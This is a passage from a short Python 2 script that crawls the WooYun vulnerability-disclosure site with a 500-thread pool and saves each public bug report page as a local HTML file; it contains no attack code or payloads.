#!/usr/bin/env python # coding:utf-8 from thread_pool import ThreadPool import hackhttp import re import os hh = hackhttp.hackhttp(hackhttp.httpconpool(500)) tp = ThreadPool(500) package = "wooyun" if not os.path.exists(package): os.mkdir(package) def vlun(wid): print "[+]%s" % wid if os.path.isfile(wid + ".html"): return _, _, html, _, _ = hh.http(url="http://wooyun.org/bugs/%s" % wid, cookcookie=False) open(package + "/" + wid + '.html', 'wb').write(html) def catalog(page): _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/new_public/page/%d" % page, cookcookie=False) for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html): tp.add_task(vlun, wid) if page > 0: